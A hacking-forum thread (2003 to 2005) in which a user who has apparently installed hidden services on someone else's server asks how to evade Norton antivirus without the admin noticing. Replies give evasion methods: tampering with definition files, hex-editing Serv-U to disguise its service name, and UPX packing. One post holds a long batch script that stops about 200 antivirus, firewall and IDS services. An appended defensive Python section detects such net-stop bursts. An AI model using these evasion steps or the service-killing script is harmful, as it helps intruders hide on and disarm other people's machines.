=k3Rn=
Oct 3 2003, 03:42 AM
hey i installed some windows services on a remote host, using firedaemon. first i wondered why i couldn't upload firedaemon.exe, it got deleted right away. then i found norton antivirus auto protect running, i shut down the service and then i could upload the file. so it seems like nav deletes firedaemon.exe right away. i wonder why my nav 2003 doesn't alert for firedaemon.exe on my hd. maybe someone can tell me that. second, i now want to bypass that detection by nav. is there a possibility to modify the file, so that it doesn't get detected? is it right that the file has to have the filename firedaemon.exe? when i tried to rename it to something else, i couldn't start services with it anymore. some explanation is needed. i hope someone can give me some support on that problem. thx in advance for all your replies. greets =k3Rn=
thatsmej
Oct 3 2003, 09:58 AM
search this forum for a virus & firewall killer, and then you can run that file.. or you can create an exclusion dir and put your files in there... think it's a reg key.. but install that virus scanner local and you'll find the key
=k3Rn=
Oct 3 2003, 07:34 PM
so, i don't want to kill the anti virus program, the admin will notice that. i also had that exclusion dir in mind, but that's also quite obvious to track back. there must be another way to bypass the scanner / the detection. i read something about hex editing exe files - but i don't have any further info on that. i need help on that.
You can mod the definition files for NAV just edit the file screw with the code .. a lot of the time NAV won't scan cause it can't read the definitions (after box is rebooted) and will only update new because it thinks it has it .pain to get it to work proper without errors but works great once yah got it
=k3Rn=
Oct 4 2003, 04:25 PM
hm can't you do it from the other side? like modifying the exe file?! i even don't understand why you can't even rename the file.
Johny
Oct 5 2003, 06:36 AM
why using firedaemon anyway? just use the actual NT install service and you'll have no probs. with the right tools and knowledge it can do the same as firedaemon + it's an extra file less
=k3Rn=
Oct 5 2003, 05:45 PM
could you share your knowledge about that please? i am very interested in better ways to set up a service. it's true that firedaemon isn't that nice to use, it appears in process list as firedaemon service and i don't even know how to change that appearance. i read that you can modify some exe files like the servudaemon.exe so that they display different service names and processes. i would be glad if someone could tell me a little more about that, i don't know exactly how to do that.
metrox
Oct 5 2003, 07:22 PM
haha, you are a hacker? some help about different things, k, technical help k, but an exact tutorial to do a little bit better hacking. no. sorry. but you are a hacker, or? you must test, develop, and many more. i think the information are enough. I have myself so much time with hacking employ. sorry, that's my opinion.
=k3Rn=
Oct 5 2003, 10:23 PM
next time you can keep your opinion for yourself. i tried to form a specific question on how to bypass the detection and how to modify the exe file so that it has a different name in process list. i am still waiting for some "friendly" guys helping me in that. so shut up. (my opinion)
mighty_falcon
Apr 27 2004, 12:57 AM
guess it's a bit late but for those wondering how to change the service name etc get yourself a hex editor, i prefer hexeditor workshop, but others may disagree on this...
search through it (using ascii text) and find the following names and then replace them with names identical in length to the original names!
libeay32.dll >> ServUDaemon.exe >>> ServUDaemon.ini >>> [Service name] Serv-U FTP Server >>> [Service Identifier] Serv-U >>>
you may also want to change the app description and also the names of the files produced when you run servu, like serustartuplog...
mighty
s3mtexx
Apr 27 2004, 08:43 AM
| QUOTE (mighty_falcon @ Apr 27 2004, 12:57 AM) | guess it's a bit late but for those wondering how to change the service name etc get yourself a hex editor, i prefer hexeditor workshop, but others may disagree on this...
search through it (using ascii text) and find the following names and then replace them with names identical in length to the original names!
libeay32.dll >> ServUDaemon.exe >>> ServUDaemon.ini >>> [Service name] Serv-U FTP Server >>> [Service Identifier] Serv-U >>>
you may also want to change the app description and also the names of the files produced when you run servu, like serustartuplog...
mighty |
thnx, that hex editor could be handy
Stephen79
Apr 27 2004, 08:53 AM
UPX and UPXRdir are a quick and often effective way to compress and confuse an antivirus system.
UPX
You can install a service from a command line, add it to the registry or use a 3rd party tool. I like this one myself:
C:\>serv
XNET 1.04
Usage : XNET <Start | Stop | Pause | Continue | List | Install | Remove | Modify | Reboot | Shutdown | Help>
DumpZ
Apr 27 2004, 09:03 AM
Well UPXing a binary often doesn't work.
@s3mtexx
libeay32.dll is that dll needed? because i only use servudaemon.exe and servudaemon.ini (hex edited) and i never had any problems
Meads
Apr 27 2004, 10:53 AM
Use the Windows NT service installer: cd to the dir and type ServUDaemon.exe /i, then net start serv-u to start it
enemc
Apr 27 2004, 11:51 AM
hi, i run trend micro pc-cillin (also antivir software) on my machine, you can enable and disable the real time scanning status, maybe you should just disable realtime scanning on that certain antivirus application so you can upload. i've never had that much success with renaming or packing with upx.
Silent Bob
Apr 27 2004, 02:03 PM
there's another prog floating about that changes the header once you pack with upx so that AV doesn't find it, maybe it's worth doing a search for that, i saw it recently
mighty_falcon
Apr 27 2004, 11:37 PM
| QUOTE (DumpZ @ Apr 27 2004, 09:03 AM) | Well UPXing a binary often doesn't work.
@s3mtexx
libeay32.dll is that dll needed? because i only use servudaemon.exe and servudaemon.ini (hex edited) and i never had any problems |
not really m8, the dll file is only needed if you plan to have an ssl connection....
MAR1LYN-MAN50N
Feb 21 2005, 09:47 PM
hey m8s i'm modding a serv-u and it really w0rk, but when i start the serv-u it creates a file called ServUStartUpLog.txt and i want to turn off this log, someone know how to do that?
nicolas9510
Feb 21 2005, 09:50 PM
hmmm read the rules no SERV-U posts
tibbar
Feb 21 2005, 10:15 PM
another one for the trash can...
MAR1LYN-MAN50N
Feb 21 2005, 11:37 PM
sorry about servu xit :x
OscarHS
Feb 23 2005, 05:17 AM
QUOTE REM echo Note: Code by G36K REM echo --------------------------------------------------- REM @echo off net stop _Avp32.exe /y net stop _Avpcc.exe /y net stop _Avpm.exe /y net stop Ackwin32.exe /y net stop Agnitum Outpost Firewall /y net stop Anti-Trojan.exe /y net stop ANTIVIR /y net stop Apvxdwin.exe /y net stop ATRACK /y net stop Autodown.exe /y net stop AVCONSOL /y net stop Avconsol.exe /y net stop Ave32.exe /y net stop Avgctrl.exe /y net stop Avkserv.exe /y net stop Avnt.exe /y net stop Avp.exe /y net stop AVP.EXE /y net stop AVP32 /y net stop Avp32.exe /y net stop Avpcc.exe /y net stop Avpdos32.exe /y net stop Avpm.exe /y net stop Avptc32.exe /y net stop Avpupd.exe /y net stop Avsched32.exe /y net stop AVSync Manager /y net stop AVSYNMGR /y net stop AVGUARD.exe /y net stop AVGNT.exe /y net stop Avwin.exe /y net stop Avwin95.exe /y net stop Avwupd32.exe /y net stop Blackd.exe /y net stop BLACKICE /y net stop BlackICE Defender /y net stop Blackice.exe /y net stop CA Sessionwall-3 /y net stop Cfiadmin.exe /y net stop Cfiaudit.exe /y net stop CFINET /y net stop Cfinet.exe /y net stop CFINET32 /y net stop Cfinet32.exe /y net stop Claw95.exe /y net stop Claw95cf.exe /y net stop Cleaner.exe /y net stop Cleaner3.exe /y net stop ConSeal PC Firewall & Private Desktop /y net stop Defwatch /y net stop Defwatch.exe /y net stop Dvp95.exe /y net stop Dvp95_0.exe /y net stop Ecengine.exe /y net stop eSafe Protect Desktop /y net stop Esafe.exe /y net stop Espwatch.exe /y net stop eTrust EZ Firewall /y net stop F-Agnt95.exe /y net stop Findviru.exe /y net stop Fprot.exe /y net stop F-Prot.exe /y net stop F-PROT95 /y net stop F-Prot95.exe /y net stop FP-WIN /y net stop Fp-Win.exe /y net stop Freedom 2 /y net stop Frw.exe /y net stop F-STOPW /y net stop F-Stopw.exe /y net stop GNAT Box Lite /y net stop IAMAPP /y net stop Iamapp.exe /y net stop Iamserv.exe /y net stop Ibmasn.exe /y net stop Ibmavsp.exe /y net stop Icload95.exe /y net stop Icloadnt.exe /y net stop ICMON /y 
net stop Icmon.exe /y net stop Icsupp95.exe /y net stop Icsuppnt.exe /y net stop Iface.exe /y net stop Internet Alert 99 /y net stop IOMON98 /y net stop Iomon98.exe /y net stop Jedi.exe /y net stop LOCKDOWN2000 /y net stop Lockdown2000.exe /y net stop Look'n'Stop /y net stop Look'n'Stop Lite /y net stop Lookout.exe /y net stop LUALL /y net stop Luall.exe /y net stop LUCOMSERVER /y net stop MCAFEE /y net stop McAfee Firewall /y net stop McAfee Internet Guard Dog Pro /y net stop Moolive.exe /y net stop Mpftray.exe /y net stop N32scanw.exe /y net stop NAVAPSVC /y net stop NAVAPW32 /y net stop Navapw32.exe /y net stop NAVLU32 /y net stop Navlu32.exe /y net stop Navnt.exe /y net stop NAVRUNR /y net stop NAVW32 /y net stop Navw32.exe /y net stop NAVWNT /y net stop Navwnt.exe /y net stop NeoWatch /y net stop NISSERV /y net stop NISUM /y net stop Nisum.exe /y net stop NMAIN /y net stop Nmain.exe /y net stop Norman Personal Firewall /y net stop Normist.exe /y net stop NORTON /y net stop Norton AntiVirus Server /y net stop Norton Internet Security /y net stop Norton Personal Firewall 2001 /y net stop Norton Personal Firewall 2002 /y net stop Norton Personal Firewall 2003 /y net stop Norton Personal Firewall 2004 /y net stop Nupgrade.exe /y net stop NVC95 /y net stop Nvc95.exe /y net stop Outpost.exe /y net stop Padmin.exe /y net stop Pavcl.exe /y net stop Pavsched.exe /y net stop Pavw.exe /y net stop Pc firewall /y net stop PC Viper /y net stop PCCIOMON /y net stop PCCMAIN /y net stop PCCWIN98 /y net stop Pccwin98.exe /y net stop Pcfwallicon.exe /y net stop Persfw.exe /y net stop PGP Gauntlet /y net stop POP3TRAP /y net stop Proxy + /y net stop PVIEW95 /y net stop Rav7.exe /y net stop Rav7win.exe /y net stop Rescue.exe /y net stop RESCUE32 /y net stop SAFEWEB /y net stop Safeweb.exe /y net stop Scan32.exe /y net stop Scan95.exe /y net stop Scanpm.exe /y net stop Scrscan.exe /y net stop Serv95.exe /y net stop Smc.exe /y net stop SMCSERVICE /y net stop Snort - Win32 GUI /y net 
stop Snort (Intrusion Detection System) /y net stop Sphinx.exe /y net stop Sphinxwall /y net stop Sweep95.exe /y net stop Sybergen Secure Desktop /y net stop Sybergen SyGate /y net stop SYMPROXYSVC /y net stop Tbscan.exe /y net stop Tca.exe /y net stop Tds2-98.exe /y net stop Tds2-Nt.exe /y net stop TermiNET /y net stop TGB:BOB /y net stop Tiny Personal Firewall /y net stop Vet95.exe /y net stop Vettray.exe /y net stop Vscan40.exe /y net stop Vsecomr.exe /y net stop VSHWIN32 /y net stop Vshwin32.exe /y net stop VSSTAT /y net stop Vsstat.exe /y net stop vbshield.exe /y net stop WEBSCANX /y net stop Webscanx.exe /y net stop WEBTRAP /y net stop Wfindv32.exe /y net stop Wingate /y net stop WinProxy /y net stop WinRoute /y net stop WyvernWorks Firewall /y net stop Zonealarm /y net stop Zonealarm.exe /y net stop AVP32 /y net stop LOCKDOWN2000 /y net stop AVP.EXE /y net stop CFINET32 /y net stop CFINET /y net stop ICMON /y net stop SAFEWEB /y net stop WEBSCANX /y net stop ANTIVIR /y net stop MCAFEE /y net stop NORTON /y net stop NVC95 /y net stop FP-WIN /y net stop IOMON98 /y net stop PCCWIN98 /y net stop F-PROT95 /y net stop F-STOPW /y net stop PVIEW95 /y net stop NAVWNT /y net stop NAVRUNR /y net stop NAVLU32 /y net stop NAVAPSVC /y net stop NISUM /y net stop SYMPROXYSVC /y net stop RESCUE32 /y net stop NISSERV /y net stop ATRACK /y net stop IAMAPP /y net stop LUCOMSERVER /y net stop LUALL /y net stop NMAIN /y net stop NAVW32 /y net stop NAVAPW32 /y net stop VSSTAT /y net stop VSHWIN32 /y net stop AVSYNMGR /y net stop AVCONSOL /y net stop WEBTRAP /y net stop POP3TRAP /y net stop PCCMAIN /y net stop PCCIOMON /y net stop Antivirsecure /y net stop Mcafeeframework /y net stop Mcshield /y net stop MCtaskmanager /y REM del c:\*ANTI-VIR*.DAT /s REM del c:\*CHKLIST*.DAT /s REM del c:\*CHKLIST*.MS /s REM del c:\*CHKLIST*.CPS /s REM del c:\*CHKLIST*.TAV /s REM del c:\*IVB*.NTZ /s REM del c:\*SMARTCHK*.MS /s REM del c:\*SMARTCHK*.CPS /s REM del c:\*AVGQT*.DAT /s REM del 
c:\*AGUARD*.DAT /s REM echo on REM echo Anti-Viren & Firewall Programme deaktiviert!!!. echo done try adding all that to a .bat file and executing it :-) njoy hope it works
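Seen from the defending side, a batch file like the one posted above shows up as a rapid run of `net stop` commands aimed at many different services on one host. The following is an added example, not part of the thread, that flags that pattern in process-creation records; the (timestamp, host, command line) record layout, the host names and the thresholds are assumptions, and the sample events are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Matches net / net1 (optionally with path and .exe) followed by "stop <service> [/y]".
NET_STOP = re.compile(
    r'^\s*"?(?:\S*\\)?net1?(?:\.exe)?"?\s+stop\s+(.+?)(?:\s+/y)?\s*$', re.I)

def parse_stop_target(cmdline):
    """Return the lower-cased service name a 'net stop' targets, else None."""
    m = NET_STOP.match(cmdline)
    return m.group(1).strip('"').lower() if m else None

def find_stop_bursts(events, window=timedelta(seconds=60), threshold=5):
    """events: iterable of (iso_timestamp, host, command_line).
    Returns {host: sorted distinct targets} for the first window on each
    host in which at least `threshold` different services were stopped."""
    per_host = defaultdict(list)
    for ts, host, cmd in events:
        target = parse_stop_target(cmd)
        if target:
            per_host[host].append((datetime.fromisoformat(ts), target))
    alerts = {}
    for host, hits in per_host.items():
        hits.sort()
        start = 0
        for end in range(len(hits)):
            # Slide the window start forward until it spans <= `window`.
            while hits[end][0] - hits[start][0] > window:
                start += 1
            targets = {t for _, t in hits[start:end + 1]}
            if len(targets) >= threshold:
                alerts[host] = sorted(targets)
                break
    return alerts

# Constructed sample records (not real logs).
SAMPLE_EVENTS = [
    ("2005-02-23T05:17:01", "WS01", "net stop NAVAPSVC /y"),
    ("2005-02-23T05:17:01", "WS01", "net stop NAVAPW32 /y"),
    ("2005-02-23T05:17:02", "WS01",
     r'C:\WINDOWS\system32\net.exe stop "Norton AntiVirus Server" /y'),
    ("2005-02-23T05:17:02", "WS01", "net1 stop SYMPROXYSVC /y"),
    ("2005-02-23T05:17:03", "WS01", "net stop Mcshield /y"),
    ("2005-02-23T09:00:00", "SRV02", "net start spooler"),
] + [(f"2005-02-23T{h:02d}:00:00", "SRV02", f"net stop svc{h}")
     for h in range(10, 15)]  # five stops, but hours apart: no burst

if __name__ == "__main__":
    print(find_stop_bursts(SAMPLE_EVENTS))
```

Commands that name a process instead of a service fail at `net stop`, but they are still recorded as process creations, so counting attempted targets catches the script whether or not any service actually stops.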